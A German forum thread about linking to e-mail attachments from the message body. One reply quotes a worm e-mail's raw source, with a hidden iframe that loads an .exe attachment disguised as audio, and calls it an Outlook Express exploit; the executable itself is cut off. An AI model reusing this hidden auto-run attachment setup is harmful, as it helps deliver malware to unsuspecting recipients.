Link in e-mail auf Dateianhang?
-
Saroll schrieb:
joa, tust du, ich glaub er meint einen link in den mailanhang...
Ja genau das meinte ich.
Saroll schrieb:
aber sollte da nicht ein verweis hin reichen??
Wie müsste der denn aussehen? Ich versuchs schon ne ganze Weile, aber ohne erfolg

-
mathi schrieb:
Saroll schrieb:
Wie müsste der denn aussehen? Ich versuchs schon ne ganze Weile, aber ohne erfolg

Er meinte sicher einen Verweis á la: "Hey Monika, die XXX pics hab' ich Dir als Anhang mitgeschickt!"

-
Sgt. Nukem schrieb:
mathi schrieb:
Saroll schrieb:

Er meinte sicher einen Verweis á la: "Hey Monika, die XXX pics hab' ich Dir als Anhang mitgeschickt!"

ja genau das hab ich gemeint

-
OK, OK, ...
... hat irgend jemand noch einen konstruktiven Vorschlag?
-
Mal im Ernst: Kann mir nicht vorstellen, daß das geht.
Das hätte ja standardisiert werden müssen!
Entweder man benutzt eine eMail-Programm-abhängige Funktion mit speziellen Tags (z.B. <ATTACH-LINK file=datei1.jpg>Lustiges Foto</ATTACH-LINK> ) - aber ich glaube nicht, daß es irgendein Mailprogramm gibt, daß das kann (wozu auch?)...
Oder das Prog kann HTML, dann könnte man das <A HREF=...> Tag verwenden. Das kann aber nur ins Netz der Netze verweisen und kann mit den Bytes am Ende der eMail absolut nichts anfangen. Man müsste quasi ein ActiveX-PlugIn o.ä. dafür zaubern... (das wiederum nur mit Outlook & Co. läuft)
aussichtslos
-
bei uns in der firma klappt das mit MS outlook. das dabei irgendwelche erweiterungen benutzt werden ist mir nicht bekannt.
ich sehe in der mail wenn ich sie mit notepad öffne dann solchen code :
<< Datei: datei.doc >>
-
Das hilft mir leider nicht weiter,
schade ich hatte gehofft, dass das möglich ist.
-
Ich schau mal in meinem Malware-Ordner... Ok, das sieht vielversprechend aus:
[Header gekürzt] Content-type: multipart/alternative; boundary="Boundary_(ID_jHwylJvs9AHl/PqF8jZEhw)" --Boundary_(ID_jHwylJvs9AHl/PqF8jZEhw) Content-type: text/html; CHARSET=US-ASCII Content-transfer-encoding: 7BIT <HTML> <HEAD></HEAD> <BODY> [b]<iframe src="cid:jceabk" height=0 width=0></iframe>[/b] <BR><BR>Hi. <BR>I'm sorry to have to inform you that the message returned below could not be delivered to one or more destinations.<BR> <BR><BR><BR>Undelivered message to <B>pehrjbhf@bigfoot.com</B> </BODY></HTML> --Boundary_(ID_jHwylJvs9AHl/PqF8jZEhw) Content-id: <jceabk> Content-type: audio/x-wav; name=aiphque.exe Content-transfer-encoding: base64 Content-disposition: attachment; filename=aiphque.exe TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [...] --Boundary_(ID_jHwylJvs9AHl/PqF8jZEhw)--Das ist der Quellcode einer Mail, die ich vor einiger Zeit erhalten habe. Das sieht mir stark nach einem iframe-Exploit aus, das bei Outlook Express bei ungepatchten Versionen wohl funktioniert (ich wollts nicht testen, da ich OjE eh nicht benutze).
"cid:content-id" scheint die gewünschte Adresse zu sein.
-
Danke für die Mühe,
aber sorry, da kann ich nicht mehr ganz folgen. Das was hinter dem </HTML> steht kann ich mit Outlook Express ja garnicht einsehen, wie soll ich da während des email-Schreibens an die cid kommen? Bei den Mails die ich selber bekommen habe, gibt es garkeinen Content-id für den Anhang

Und was immer ein iframe-Exploit ist, wenn ich den Brauche und der nicht bei aktuellen patches funzt, dann bringst ja auch nichts

Gruss mathi
-
Natürlich kannst du mit einer Mailclient-Simulation wie Outlook Express keine solche Mail verfassen. Ausblick Exzess sollte man eh meiden wie die Pest, nimm lieber eine Alternative wie Thunderbird. Thunderbird ist außerdem um Längen komfortabler als OjE.
Zur zitierten Mail: Die bekam ich ziemlich sicher von einem Wurm mit eigener SMTP-Engine. Dir wird nichts anderes übrig bleiben als auch soetwas zu benutzen/programmieren, ansonsten klappt das mit dem internen Link nicht. Du musst also manuell eine Verbindung zu einem SMTP-Server aufbauen und die Mail absetzen. Das geht mit den Socket-Funktionen (google).
Das iframe-Exploit ist nur eine Möglichkeit, den Link anzuwenden.
<iframe src="cid:jceabk"></iframe>Nimm anstelle iframe mal a und anstelle src href:
<a href="cid:jceabk">zum Dateianhang</a>Andere Frage: Was bezweckst du damit?
-
cd9000 schrieb:
Andere Frage: Was bezweckst du damit?
Eigentlich wollte ich meine Mails (enthalten häufig mehrere Anhänge) nur ein wenig "komfortabler" gestallten. Wenn man z.B. Längere Texte hat, die Funktionsweise, Inhalte und Zusammenhänge der einzelnen Anhangteile erklären, könnte man direkt innerhalb der Erklärungen auf den gerade besprochenen Teil verweisen. (z.B. eine Art Gebrauchsanweisung, Ablaufplan, etc.).
Aber dass das so aufwendig wird hätte ich nicht gedacht. Werde mir wohl was anderes einfallen lassen müssen.
Danke und Gruss mathi
-
Schreibe die Mail als HTML mit Links, dann packst Du alles in ein dickes ZIP (mit Anhängen) und verschickst das!
Dem Adressant schreibst Du dann: Bitte entpacken und index.html aufrufen!